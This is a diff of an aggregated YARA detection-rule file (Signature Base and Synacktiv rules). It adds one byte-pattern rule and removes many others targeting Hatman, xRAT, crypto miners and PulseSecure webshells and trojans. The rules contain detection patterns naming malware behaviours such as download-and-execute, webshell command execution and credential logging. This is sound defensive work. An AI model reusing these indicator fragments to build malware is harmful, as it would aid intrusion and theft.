+		license_url = "https://github.com/synacktiv/synacktiv-rules/blob/81b4591c31165a77783671ea63d64ac79c2e84c7/LICENSE.md"
+		hash = "0500c9d0b91e62993447cdcf5f691092aff409eca24080ce149f34e48a0445e0"
+		hash = "13c1cfb12017aa138e2f8d788dcd867806cc8fd6ae05c3ab7d886c18bcd4c48a"
+		hash = "1a9524a2c39e76e0ea85abba1f0ddddc5d0d0a3a601a1b75e8d224ad93968b5e"
+		hash = "1bd710dc054716bf5553abd05d282d9aeb7eb30a76320bd6be4ce2efc04b20bc"
+		hash = "2457a3241ec13c77b4132d6c5923e63b51a4d05a96dc0ae249c92a43ed9c7c04"
+		hash = "328570168780a5dd39e1b49db00430c02d3292ff1e8b14ff6aacce40d90d908f"
+		hash = "39d51ef91e189de44696ac67590b4251a6a320719668399127096dc57cbecba3"
+		hash = "4c4ec3314afe4284e4cf8bf2fdfb402820932ddcf16913a88a2b7c1d55a12a90"
+		hash = "4d1e87b372af0f52b9e2d7a2ac1d223575d29de5e3c0570a96b0d2ff346214f0"
+		hash = "4d49ceb20ad85b117dd30f317977526e73cb5dd622705277b5cbc691972abb4b"
+		hash = "5138090aee794a08de4b0482bbe58adbd918467d14dedf51961963b324e63f89"
+		hash = "63d32b6b29e5d4f8aab4b59681d853e481e858cbf1acfcb190469d8881f47aa6"
+		hash = "79d6dfacfa0e0e5bc48d8d894dae261b9412b9c04a39b6ebf992cb8a5a40de95"
+		hash = "82aec8846232a43a77e2b5c5a80de523b2c7f912d60bce3ac28242156395b9d0"
+		hash = "92cc697b909c398de8533499271c9d3c2425a71feaa0d70bac7428d90423ddff"
+		hash = "9e3cba612d5f69e27534e3d2ceb7bb6067d44ac93e5b1e74bf994a94dfd706b6"
+		hash = "a4139ffd12565edf5291dc5580a70e600f76695b03376e5c0130ade18a6a7bcd"
+		hash = "a8bda8e1d39ee61998381a2f0bfeb7069b19035551b8895eb48642bf98ade3d1"
+		hash = "aeddd8240c09777a84bb24b5be98e9f5465dc7638bec41fb67bbc209c3960ae1"
+		hash = "b9c40960259b9b14d80c8b1cb3438913f8550fe56dbdfe314b53c7ceae77ccb0"
+		hash = "c061952d49f03acf9e464ab927b0b6b3bc38da8caaf077e70ace77116b6d1b8c"
+		hash = "c1ca82411e293ec5d16a8f81ed9466972a8ead23bd4080aaf9505baccce575ba"
+		hash = "c6cf82919b809967d9d90ea73772a8aa1c1eb3bc59252d977500f64f1a0d6731"
+		hash = "c8b40fbb5cd27f42c143c35b67c700f7ea42a2084418c5e2da82fb0ac094f966"
+		hash = "d3190648bc428640a721b7d3c2b05c56e855355e8b44561e3b701e80e97f7ea7"
+		hash = "d879ff9275cd62f4e7935261e17461d3a3cd1a29d65a5688bd382c47ae680ad6"
+		hash = "d9e868af5567a8c823f48f0f30440f1a9d77b52b2e6d785e116c450c48df9fc6"
+		logic_hash = "adf3e21aa146b3def9baa73829126d8738db9cedb96e783a6baa589c77d7d518"
+		score = 75
+		quality = 80
+		tags = "COMMODITY, FILE"
+		license = "DRL-1.1"
+		tlp = "TLP:CLEAR"
+		pap = "PAP:CLEAR"
+
+	strings:
+		$expand_key = {
+            ( 48 8B 84 24 | 48 8B 9C 24 | 48 8B 8C 24 | 48 8B BC 24 | 48 8B B4 24 | 4C 8B 84 24 | 4C 8B 8C 24 | 4C 8B 94 24 | 4C 8B 9C 24 ) ?? ?? ?? ??
+            ( 48 83 F8 20 | 48 83 FB 20 | 48 83 F9 20 | 48 83 FF 20 | 48 83 FE 20 | 49 83 F8 20 | 49 83 F9 20 | 49 83 FA 20 | 49 83 FB 20 )
+            ( 0F 8D ?? ?? ?? ?? | 7D ?? )
+            ( 48 89 ?? | 49 89 ?? | 4C 89 ?? | 4D 89 ?? )
+            ( 48 83 E0 1F | 48 83 E3 1F | 48 83 E1 1F | 48 83 E7 1F | 48 83 E6 1F | 49 83 E0 1F | 49 83 E1 1F | 49 83 E2 1F | 49 83 E3 1F | 83 E0 1F | 83 E3 1F | 83 E1 1F | 83 E7 1F | 83 E6 1F | 41 83 E0 1F | 41 83 E1 1F | 41 83 E2 1F | 41 83 E3 1F )
+            ( 83 C0 E0 | 83 C3 E0 | 83 C1 E0 | 83 C7 E0 | 83 C6 E0 | 41 83 C0 E0 | 41 83 C1 E0 | 41 83 C2 E0 | 41 83 C3 E0 )
+            ( F7 D8 | F7 DB | F7 D9 | F7 DF | F7 DE | 41 F7 D8 | 41 F7 D9 | 41 F7 DA | 41 F7 DB )
+        }
+		$shuffle = {
+            ( 44 0F B6 04 | 44 0F B6 0C | 44 0F B6 14 | 44 0F B6 1C | 44 0F B6 44 | 44 0F B6 4C | 44 0F B6 54 | 44 0F B6 5C | 46 0F B6 04 | 46 0F B6 0C | 46 0F B6 14 | 46 0F B6 1C | 46 0F B6 44 | 46 0F B6 4C | 46 0F B6 54 | 46 0F B6 5C ) [1-2]
+            ( 45 0F AF C0 | 45 0F AF C1 | 45 0F AF C2 | 45 0F AF C3 | 45 0F AF C8 | 45 0F AF C9 | 45 0F AF CA | 45 0F AF CB | 45 0F AF D0 | 45 0F AF D1 | 45 0F AF D2 | 45 0F AF D3 | 45 0F AF D8 | 45 0F AF D9 | 45 0F AF DA | 45 0F AF DB | 44 0F AF C0 | 44 0F AF C1 | 44 0F AF C2 | 44 0F AF C3 | 44 0F AF C8 | 44 0F AF C9 | 44 0F AF CA | 44 0F AF CB | 44 0F AF D0 | 44 0F AF D1 | 44 0F AF D2 | 44 0F AF D3 | 44 0F AF D8 | 44 0F AF D9 | 44 0F AF DA | 44 0F AF DB )
+            [0-4]
+            ( 41 B8 | 41 B9 | 41 BA | 41 BB ) FF FF FF FF
+            ( 45 0F B6 C0 | 45 0F B6 C1 | 45 0F B6 C2 | 45 0F B6 C3 | 45 0F B6 C8 | 45 0F B6 C9 | 45 0F B6 CA | 45 0F B6 CB | 45 0F B6 D0 | 45 0F B6 D1 | 45 0F B6 D2 | 45 0F B6 D3 | 45 0F B6 D8 | 45 0F B6 D9 | 45 0F B6 DA | 45 0F B6 DB )
+            [0-4]
+            ( 41 89 D0 | 41 89 D1 | 41 89 D2 | 41 89 D3 | 89 D0 | 89 D1 | 89 D2 | 89 D3 )
+            31 D2
+            ( 66 41 F7 F0 | 66 41 F7 F1 | 66 41 F7 F2 | 66 41 F7 F3 )
+            ( 41 0F AF D0 | 41 0F AF D1 | 41 0F AF D2 | 41 0F AF D3 | 44 0F AF C2 | 44 0F AF CA | 44 0F AF D2 | 44 0F AF DA | 0F AF D0 | 0F AF D1 | 0F AF D2 | 0F AF D3 | 0F AF C2 | 0F AF CA | 0F AF D2 | 0F AF DA )
+            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
+            ( 31 ?? | 41 31 ?? | 44 31 ?? | 45 31 ?? )
+            ( 44 88 04 ?F | 44 88 0C ?F | 44 88 14 ?F | 44 88 1C ?F | 44 88 04 ?7 | 44 88 0C ?7 | 44 88 14 ?7 | 44 88 1C ?7 | 88 04 ?F | 88 0C ?F | 88 14 ?F | 88 1C ?F | 88 04 ?7 | 88 0C ?7 | 88 14 ?7 | 88 1C ?7 | 44 88 04 3? | 44 88 0C 3? | 44 88 14 3? | 44 88 1C 3? | 88 04 3? | 88 0C 3? | 88 14 3? | 88 1C 3? )
+        }
+
+	condition:
+		( uint16be( 0 ) == 0x4d5a or uint32be( 0 ) == 0x7f454c46 or uint32be( 0 ) == 0xcffaedfe ) and filesize < 5MB and all of them
 }
 /*
  * YARA Rule Set
  * Repository Name: Signature Base
  * Repository: https://github.com/Neo23x0/signature-base
- * Retrieval Date: 2025-06-08
+ * Retrieval Date: 2025-06-15
  * Git Commit: 391a990859091dbc4c21d15db335b371090f606e
- * Number of Rules: 4338
- * Skipped: 0 (age), 9 (quality), 4 (score), 0 (importance)
+ * Number of Rules: 4339
+ * Skipped: 0 (age), 8 (quality), 4 (score), 0 (importance)
  *
  *
  * LICENSE
@@ -250114,37221 +250600,35446 @@ private rule SIGNATURE_BASE_Hatman_Nullsub_PRIVATE : HATMAN
 		logic_hash = "7e7a7494e68450a03aeddfaa1fd0a3fb3cff06684d5bb0c4615571e698293fe3"
 		score = 75
 		quality = 85
-		tags = "HATMAN"
-
-	strings:
-		$nullsub = { ff ff 60 38  02 00 00 44  20 00 80 4e }
-
-	condition:
-		$nullsub
-}
-private rule SIGNATURE_BASE_Hatman_Dividers_PRIVATE : HATMAN
-{
-	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Florian Roth"
-		id = "1612a184-e06c-5c1b-987d-04e330e17ed0"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L38-L44"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "92ec47ea81b78ec9b05f5c17164daaef7112c8590b4443f70cf3bf2efd108e1f"
-		score = 75
-		quality = 85
-		tags = "HATMAN"
-
-	strings:
-		$div1 = { 9a 78 56 00 }
-		$div2 = { 34 12 00 00 }
-
-	condition:
-		$div1 and $div2
-}
-private rule SIGNATURE_BASE_Hatman_Setstatus_PRIVATE : HATMAN
-{
-	meta:
-		description = "No description has been set in the source file - Signature Base"
-		author = "Florian Roth"
-		id = "a0619dad-7cee-585a-9246-b3d4554e512f"
-		date = "2023-12-05"
-		modified = "2023-12-05"
-		reference = "https://github.com/Neo23x0/signature-base"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L21-L28"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "264292bbc479413bf70f05b96bcea3c856906eb8c711720831bea9b887a7ffb0"
-		score = 75
-		quality = 85
-		tags = "HATMAN"
-
-	strings:
-		$preset = { 80 00 40 3c  00 00 62 80  40 00 80 3c  40 20 03 7c
-                        ?? ?? 82 40  04 00 62 80  60 00 80 3c  40 20 03 7c
-                        ?? ?? 82 40  ?? ?? 42 38                           }
-
-	condition:
-		$preset
-}
-rule SIGNATURE_BASE_Xrat_1 : FILE
-{
-	meta:
-		description = "Detects Patchwork malware"
-		author = "Florian Roth (Nextron Systems)"
-		id = "170c926a-2020-5269-85b8-6fe9ad28ef76"
-		date = "2017-12-11"
-		modified = "2023-12-05"
-		reference = "https://goo.gl/Pg3P4W"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_xrat.yar#L12-L41"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "032c5af4f34959783102977543d2caf6199b8d1880a64797882f591e36c64d69"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "92be93ec4cbe76182404af0b180871fbbfa3c7b34e4df6745dbcde480b8b4b3b"
-		hash2 = "f1a45adcf907e660ec848c6086e28c9863b7b70d0d38417dd05a4261973c955a"
-
-	strings:
-		$x1 = "\" -CHECK & PING -n 2 127.0.0.1 & EXIT" fullword wide
-		$x2 = "xClient.Core.Elevation" fullword ascii
-		$x3 = ">> Welcome to MAX-Shell :Session created" fullword wide
-		$x4 = "xClient.Properties.Resources.resources" fullword ascii
-		$x5 = "<description>My UAC Compatible application</description>" fullword ascii
-		$s1 = "ping -n 20 localhost > nul" fullword wide
-		$s2 = "DownloadAndExecute" fullword ascii
-		$s3 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.114 Safari/537.36" fullword wide
-		$s4 = "Client.exe" fullword ascii
-		$s5 = "Microsoft -Defender" fullword wide
-		$s6 = "Microsoft- Defender" fullword wide
-		$s7 = "set_RunHidden" fullword ascii
-
-	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
-}
-rule SIGNATURE_BASE_Coinminer_Strings : SCRIPT HIGHVOL FILE
-{
-	meta:
-		description = "Detects mining pool protocol string in Executable"
-		author = "Florian Roth (Nextron Systems)"
-		id = "ac045f83-5f32-57a9-8011-99a2658a0e05"
-		date = "2018-01-04"
-		modified = "2021-10-26"
-		reference = "https://minergate.com/faq/what-pool-address"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L2-L18"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2d63bf90560c83ab6c09e0c82b6a6449bca6e7e7d0945d3782c2fa9a726b2ca1"
-		score = 60
-		quality = 85
-		tags = "SCRIPT, HIGHVOL, FILE"
-		nodeepdive = 1
-
-	strings:
-		$sa1 = "stratum+tcp://" ascii
-		$sa2 = "stratum+udp://" ascii
-		$sb1 = "\"normalHashing\": true,"
-
-	condition:
-		filesize < 3000KB and 1 of them
-}
-rule SIGNATURE_BASE_Coinhive_Javascript_Monerominer : HIGHVOL FILE
-{
-	meta:
-		description = "Detects CoinHive - JavaScript Crypto Miner"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4f40c342-fcdc-5c73-a3cf-7b2ed438eaaf"
-		date = "2018-01-04"
-		modified = "2023-12-05"
-		reference = "https://coinhive.com/documentation/miner"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L20-L33"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4146b034a9785f1bb7c60db62db0e478d960f2ac9adb7c5b74b365186578ca47"
-		score = 50
-		quality = 85
-		tags = "HIGHVOL, FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$s2 = "CoinHive.CONFIG.REQUIRES_AUTH" fullword ascii
-
-	condition:
-		filesize < 65KB and 1 of them
-}
-rule SIGNATURE_BASE_PUA_Cryptominer_Jan19_1 : FILE
-{
-	meta:
-		description = "Detects Crypto Miner strings"
-		author = "Florian Roth (Nextron Systems)"
-		id = "aebfdce9-c2dd-5f24-aa25-071e1a961239"
-		date = "2019-01-31"
-		modified = "2023-12-05"
-		reference = "Internal Research"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L35-L52"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7097d404e0317230a5f60fc66fbcb2a2a5315f8fd348a7e689aaf75c26684f9e"
-		score = 80
-		quality = 85
-		tags = "FILE"
-		hash1 = "ede858683267c61e710e367993f5e589fcb4b4b57b09d023a67ea63084c54a05"
-
-	strings:
-		$s1 = "Stratum notify: invalid Merkle branch" fullword ascii
-		$s2 = "-t, --threads=N       number of miner threads (default: number of processors)" fullword ascii
-		$s3 = "User-Agent: cpuminer/" ascii
-		$s4 = "hash > target (false positive)" fullword ascii
-		$s5 = "thread %d: %lu hashes, %s khash/s" fullword ascii
-
-	condition:
-		filesize < 1000KB and 1 of them
-}
-rule SIGNATURE_BASE_PUA_Crypto_Mining_Commandline_Indicators_Oct21 : SCRIPT FILE
-{
-	meta:
-		description = "Detects command line parameters often used by crypto mining software"
-		author = "Florian Roth (Nextron Systems)"
-		id = "afe5a63a-08c3-5cb7-b4b1-b996068124b7"
-		date = "2021-10-24"
-		modified = "2023-12-05"
-		reference = "https://www.poolwatch.io/coin/monero"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/pua_cryptocoin_miner.yar#L54-L88"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "7ae1a77d8ff02ec539ce2b8be668530c3f509f0c408dfa7f2b749b0a4d6f45b7"
-		score = 65
-		quality = 85
-		tags = "SCRIPT, FILE"
-
-	strings:
-		$s01 = " --cpu-priority="
-		$s02 = "--donate-level=0"
-		$s03 = " -o pool."
-		$s04 = " -o stratum+tcp://"
-		$s05 = " --nicehash"
-		$s06 = " --algo=rx/0 "
-		$se1 = "LS1kb25hdGUtbGV2ZWw9"
-		$se2 = "0tZG9uYXRlLWxldmVsP"
-		$se3 = "tLWRvbmF0ZS1sZXZlbD"
-		$se4 = "c3RyYXR1bSt0Y3A6Ly"
-		$se5 = "N0cmF0dW0rdGNwOi8v"
-		$se6 = "zdHJhdHVtK3RjcDovL"
-		$se7 = "c3RyYXR1bSt1ZHA6Ly"
-		$se8 = "N0cmF0dW0rdWRwOi8v"
-		$se9 = "zdHJhdHVtK3VkcDovL"
-
-	condition:
-		filesize < 5000KB and 1 of them
-}
-rule SIGNATURE_BASE_FE_Webshell_PL_ATRIUM_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "b2663343-0bae-5215-a443-866ab8626bff"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L12-L27"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "ca0175d86049fa7c796ea06b413857a3"
-		logic_hash = "869b397616495c644beb997602eac84ddcdbacce4c14755c555f5bda36663ca2"
-		score = 75
-		quality = 60
-		tags = ""
-
-	strings:
-		$s1 = "CGI::param("
-		$s2 = "system("
-		$s3 = /if[\x09\x20]{0,32}\(CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)\)\s{0,128}\{[\x09\x20]{0,32}print [\x22\x27]Cache-Control: no-cache\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}print [\x22\x27]Content-type: text\/html\\n\\n[\x22\x27][\x09\x20]{0,32};\s{0,128}my \$\w{1,64}[\x09\x20]{0,32}=[\x09\x20]{0,32}CGI::param\([\x22\x27]\w{1,64}[\x22\x27]\)[\x09\x20]{0,32};\s{0,128}system\([\x22\x27]\$/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_Trojan_SH_ATRIUM_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "c49441f4-a138-534c-a858-a7462ed865c9"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L29-L45"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a631b7a8a11e6df3fccb21f4d34dbd8a"
-		logic_hash = "672a293660d89d5d7d62a658c360bad0b6408611d8794744b17a81e6a75ceea7"
-		score = 75
-		quality = 35
-		tags = ""
-
-	strings:
-		$s1 = "CGI::param("
-		$s2 = "Cache-Control: no-cache"
-		$s3 = "system("
-		$s4 = /sed -i [^\r\n]{1,128}CGI::param\([^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Cache-Control: no-cache[^\r\n]{1,128}print[\x20\x09]{1,32}[^\r\n]{1,128}Content-type: text\/html[^\r\n]{1,128}my [^\r\n]{1,128}=[\x09\x20]{0,32}CGI::param\([^\r\n]{1,128}system\(/
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_HARDPULSE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "f9a2922e-6b8e-5f92-a947-3215ee8883ac"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L46-L65"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "980cba9e82faf194edb6f3cc20dc73ff"
-		logic_hash = "37fc40fd998d3294edb05707170bc2deec524fc6451bff212901f9ac3e34bb35"
-		score = 75
-		quality = 83
-		tags = ""
-
-	strings:
-		$r1 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}my[\x09\x20]{1,32}\$\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}unless[\x09\x20]{0,32}\(open\(\$\w{1,64},[\x09\x20]{0,32}\$\w{1,64}\)\)\s{0,128}\{\s{1,128}goto[\x09\x20]{1,32}\w{1,64}[\x09\x20]{0,32}\x3b\s{1,128}return[\x09\x20]{1,32}0[\x09\x20]{0,32}\x3b\s{0,128}\}/
-		$r2 = /open[\x09\x20]{0,32}\(\*\w{1,64}[\x09\x20]{0,32},[\x09\x20]{0,32}[\x22\x27]>/
-		$r3 = /if[\x09\x20]{0,32}\(\$\w{1,64}[\x09\x20]{1,32}eq[\x09\x20]{1,32}[\x22\x27]\w{1,64}[\x22\x27]\)\s{0,128}\{\s{1,128}print[\x09\x20]{0,32}[\x22\x27]Content-type/
-		$s1 = "CGI::request_method()"
-		$s2 = "CGI::param("
-		$s3 = "syswrite("
-		$s4 = "print $_"
-
-	condition:
-		all of them
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_LOCKPICK_1 : FILE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "00c09378-25a0-55f1-8d93-7b22d98bd8c2"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L66-L80"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "e8bfd3f5a2806104316902bbe1195ee8"
-		logic_hash = "1623c2dc63fe7d595069a024b715bbca267ec1c9400afcadc377ae58afb81a2a"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$sb1 = { 83 ?? 63 0F 84 [4] 8B 45 ?? 83 ?? 01 89 ?? 24 89 44 24 04 E8 [4] 85 C0 }
-		$sb2 = { 83 [2] 63 74 ?? 89 ?? 24 04 89 ?? 24 E8 [4] 83 [2] 01 85 C0 0F [5] EB 00 8B ?? 04 83 F8 02 7? ?? 83 E8 01 C1 E0 02 83 C0 00 89 44 24 08 8D 83 [4] 89 44 24 04 8B ?? 89 04 24 E8 }
-
-	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and ( @sb1 [ 1 ] < @sb2 [ 1 ] )
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux32_PACEMAKER : FILE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "459e26f1-4ea9-56dd-ad71-0ed2c7499aea"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L81-L98"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7881c4de4d57828f7e1cab15687274b"
-		logic_hash = "f3f89744ce558179f36da3b412ba4afb3798684e6d976ef59de565b5a3323ad6"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = "\x00/proc/%d/mem\x00"
-		$s2 = "\x00/proc/%s/maps\x00"
-		$s3 = "\x00/proc/%s/cmdline\x00"
-		$sb1 = { C7 44 24 08 10 00 00 00 C7 44 24 04 00 00 00 00 8D 45 E0 89 04 24 E8 [4] 8B 45 F4 83 C0 0B C7 44 24 08 10 00 00 00 89 44 24 04 8D 45 E0 89 04 24 E8 [4] 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] 85 C0 74 ?? 8D 45 E0 89 04 24 E8 [4] EB }
-		$sb2 = { 8B 95 [4] B8 [4] 8D 8D [4] 89 4C 24 10 8D 8D [4] 89 4C 24 0C 89 54 24 08 89 44 24 04 8D 85 [4] 89 04 24 E8 [4] C7 44 24 08 02 00 00 00 C7 44 24 04 00 00 00 00 8B 45 ?? 89 04 24 E8 [4] 89 45 ?? 8D 85 [4] 89 04 24 E8 [4] 89 44 24 08 8D 85 [4] 89 44 24 04 8B 45 ?? 89 04 24 E8 [4] 8B 45 ?? 89 45 ?? C7 45 ?? 00 00 00 00 [0-16] 83 45 ?? 01 8B 45 ?? 3B 45 0C }
-
-	condition:
-		(( uint32( 0 ) == 0x464c457f ) and ( uint8( 4 ) == 1 ) ) and all of them
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_Linux_PACEMAKER : FILE
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "5a20260a-5389-57da-956c-97063fed5015"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L99-L115"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d7881c4de4d57828f7e1cab15687274b"
-		logic_hash = "cf83024cbbd500a301ac3c859b680cd79acabc232ea6f42c23fe9f8918a8d914"
-		score = 75
-		quality = 85
-		tags = "FILE"
-
-	strings:
-		$s1 = "\x00Name:%s || Pwd:%s || AuthNum:%s\x0a\x00"
-		$s2 = "\x00/proc/%d/mem\x00"
-		$s3 = "\x00/proc/%s/maps\x00"
-		$s4 = "\x00/proc/%s/cmdline\x00"
-
-	condition:
-		( uint32( 0 ) == 0x464c457f ) and all of them
-}
-rule SIGNATURE_BASE_FE_APT_Webshell_PL_PULSECHECK_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "f375fdd8-567b-569b-85f4-af54a35d2a93"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L116-L136"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "a1dcdf62aafc36dd8cf64774dea80d79fb4e24ba2a82adf4d944d9186acd1cc1"
-		logic_hash = "aba457dd33232ef37ca145c5b7cd9c5fe809730339a55c5e90ac46b4a136f6cb"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$r1 = /while[\x09\x20]{0,32}\(<\w{1,64}>\)[\x09\x20]{0,32}\{\s{1,256}\$\w{1,64}[\x09\x20]{0,32}\.=[\x09\x20]{0,32}\$_;\s{0,256}\}/
-		$s1 = "use Crypt::RC4;"
-		$s2 = "use MIME::Base64"
-		$s3 = "MIME::Base64::decode("
-		$s4 = "popen("
-		$s5 = " .= $_;"
-		$s6 = "print MIME::Base64::encode(RC4("
-		$s7 = "HTTP_X_"
-
-	condition:
-		$s1 and $s2 and ( @s3 [ 1 ] < @s4 [ 1 ] ) and ( @s4 [ 1 ] < @s5 [ 1 ] ) and ( @s5 [ 1 ] < @s6 [ 1 ] ) and ( #s7 > 2 ) and $r1
-}
-rule SIGNATURE_BASE_FE_APT_Trojan_PL_PULSEJUMP_1
-{
-	meta:
-		description = "Detects samples mentioned in PulseSecure report"
-		author = "Mandiant"
-		id = "690cc347-e60f-5cac-b65d-367ecee69251"
-		date = "2021-04-16"
-		modified = "2023-12-05"
-		reference = "https://www.fireeye.com/blog/threat-research/2021/04/suspected-apt-actors-leverage-bypass-techniques-pulse-secure-zero-day.html"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_pulsesecure.yar#L137-L153"
-		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "91ee23ee24e100ba4a943bb4c15adb4c"
-		logic_hash = "c9aa2b9ef8aff14c20ed6597b1a71eafc3e3c181aabf9a3a68df18945207ff86"
-		score = 75
-		quality = 85
-		tags = ""
-
-	strings:
-		$s1 = "open("
-		$s2 = ">>/tmp/"
-		$s3 = "syswrite("
